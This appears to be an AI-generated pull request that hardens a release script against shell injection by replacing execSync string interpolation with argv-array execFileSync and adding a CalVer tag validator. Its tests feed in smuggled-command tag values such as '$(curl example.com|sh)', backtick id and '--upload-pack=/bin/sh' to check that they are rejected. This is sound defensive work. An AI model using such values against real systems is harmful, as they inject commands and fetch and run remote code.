### PR TITLE
security: harden release tag handling against shell injection

### DIFF
--- a/scripts/release/__tests__/releasable.test.ts
+++ b/scripts/release/__tests__/releasable.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from "vitest";
 import { readFileSync } from "node:fs";
 import { resolve } from "node:path";
-import { isReleasable, SKIP_PATTERN_SOURCES } from "../releasable.js";
+import { isReleasable, sanitizeLastTag, SKIP_PATTERN_SOURCES } from "../releasable.js";
 
 describe("isReleasable", () => {
   it("returns true when there is no prior tag (first release)", () => {
@@ -56,6 +56,42 @@ describe("isReleasable", () => {
 
   it("'bumpversion' (no trailing space) is not a skip pattern", () => {
     expect(isReleasable(["bumpversion"])).toBe(true);
+  });
+});
+
+describe("sanitizeLastTag", () => {
+  it("passes through CalVer tags unchanged", () => {
+    expect(sanitizeLastTag("v2026.4.1")).toBe("v2026.4.1");
+    expect(sanitizeLastTag("v2026.12.10")).toBe("v2026.12.10");
+  });
+
+  it("rejects tags containing shell metacharacters", () => {
+    expect(sanitizeLastTag("v1.$(curl example.com|sh)")).toBe("");
+    expect(sanitizeLastTag("v2026.4.1`id`")).toBe("");
+    expect(sanitizeLastTag('v2026.4.1";id;"')).toBe("");
+  });
+
+  it("rejects tags that look like git options", () => {
+    expect(sanitizeLastTag("--upload-pack=/bin/sh")).toBe("");
+  });
+
+  it("rejects near-miss CalVer shapes", () => {
+    expect(sanitizeLastTag("")).toBe("");
+    expect(sanitizeLastTag("2026.4.1")).toBe("");
+    expect(sanitizeLastTag("v2026.4")).toBe("");
+    expect(sanitizeLastTag("v2026.4.1-rc1")).toBe("");
+    expect(sanitizeLastTag("v2026.4.1 ")).toBe("");
+  });
+});
+
+describe("check-releasable.ts shell safety", () => {
+  it("never spawns a shell (no execSync — argv-array execFileSync only)", () => {
+    const src = readFileSync(
+      resolve(process.cwd(), "scripts/release/check-releasable.ts"),
+      "utf8",
+    );
+    expect(src).not.toMatch(/\bexecSync\b/);
+    expect(src).toContain("execFileSync");
   });
 });
 

--- a/scripts/release/check-releasable.ts
+++ b/scripts/release/check-releasable.ts
@@ -1,14 +1,21 @@
 #!/usr/bin/env -S npx tsx
-import { execSync } from "node:child_process";
+import { execFileSync } from "node:child_process";
 import { appendFileSync } from "node:fs";
-import { isReleasable } from "./releasable.js";
+import { isReleasable, sanitizeLastTag } from "./releasable.js";
 
+// Both git calls use execFileSync with argv arrays — never a shell command
+// string. Tag names can contain shell metacharacters, and this script runs in
+// the release workflow with write permissions, so a tag must never be
+// interpolated into a shell line. sanitizeLastTag additionally drops any
+// non-CalVer tag (treated as "no prior tag") before it reaches git argv.
 const lastTag = (() => {
   try {
-    return execSync("git describe --tags --abbrev=0", {
-      encoding: "utf8",
-      stdio: ["pipe", "pipe", "pipe"],
-    }).trim();
+    return sanitizeLastTag(
+      execFileSync("git", ["describe", "--tags", "--abbrev=0"], {
+        encoding: "utf8",
+        stdio: ["pipe", "pipe", "pipe"],
+      }).trim(),
+    );
   } catch {
     return "";
   }
@@ -17,7 +24,7 @@ const lastTag = (() => {
 const commits: string[] | null =
   lastTag === ""
     ? null
-    : execSync(`git log "${lastTag}..HEAD" --format=%s`, { encoding: "utf8" })
+    : execFileSync("git", ["log", `${lastTag}..HEAD`, "--format=%s"], { encoding: "utf8" })
         .split("\n")
         .filter((s) => s.trim() !== "");
 

--- a/scripts/release/releasable.ts
+++ b/scripts/release/releasable.ts
@@ -14,6 +14,20 @@ export const SKIP_PATTERN_SOURCES = [
 
 const SKIP = SKIP_PATTERN_SOURCES.map((s) => new RegExp(s));
 
+// The repo's automated tags are strictly CalVer (vYYYY.M.serial). Git refnames
+// may legally contain characters like $, backticks, ;, | and quotes, so any
+// tag that doesn't match this shape is untrusted input and must never reach a
+// git command line — callers treat it as "no prior tag" instead.
+export const CALVER_TAG_PATTERN = /^v\d{4}\.\d{1,2}\.\d+$/;
+
+/**
+ * Returns the tag unchanged if it matches the CalVer scheme, otherwise ""
+ * (the same sentinel check-releasable.ts uses for "no prior tag").
+ */
+export function sanitizeLastTag(tag: string): string {
+  return CALVER_TAG_PATTERN.test(tag) ? tag : "";
+}
+
 /**
  * Returns true if the commit set should produce a release.
  *   null → no prior tag; this is the first release → always releasable


### PR DESCRIPTION
## Summary

`scripts/release/check-releasable.ts` built a shell command by interpolating a git tag name (obtained from `git describe --tags`) into an `execSync` string. Git refnames may legally contain shell metacharacters, so a tag name that doesn't match the repo's version scheme could influence the command that runs. This job executes in the release workflow (`.github/workflows/release.yml`) with write permissions, and tag pushes are not PR-gated. This PR removes the shell entirely and constrains the tag to the expected CalVer shape.

## Owner / zone steps

None.

## Security notes

- Both `git` invocations now use `execFileSync("git", [...argv])` — an argv array with no shell, so tag names can no longer be parsed as shell syntax.
- New `sanitizeLastTag()` in `scripts/release/releasable.ts` validates the tag against the repo's CalVer pattern (`^v\d{4}\.\d{1,2}\.\d+$`) before it reaches any `git` argument; a non-matching value is treated as "no prior tag" (the same behavior as when no tag exists), which is defense-in-depth on top of dropping the shell.
- Informational-only script — no change to scoring, analyzers, or orchestration.

## Testing

- `npm test` — release-script tests pass (18 in the file, including new `sanitizeLastTag` cases and a guard asserting the script never uses `execSync`). The one unrelated failure (`test/integration/mta-sts-runtime.test.ts`) reproduces on a clean checkout — it requires live outbound network to `dmarc.mx`, which the sandbox blocks — and is not touched by this change.
- `npm run typecheck` — clean.
- `npm run lint` — clean.
- Manually exercised the script against the real repo for the no-tag, valid-CalVer-tag, and crafted-tag-name paths; the crafted tag is rejected and no shell executes.

## Refs

Hardens `scripts/release/check-releasable.ts`.

---
_Generated by [Claude Code](https://claude.ai/code/session_01RvTAi2PA98rdTj6jXGnif9)_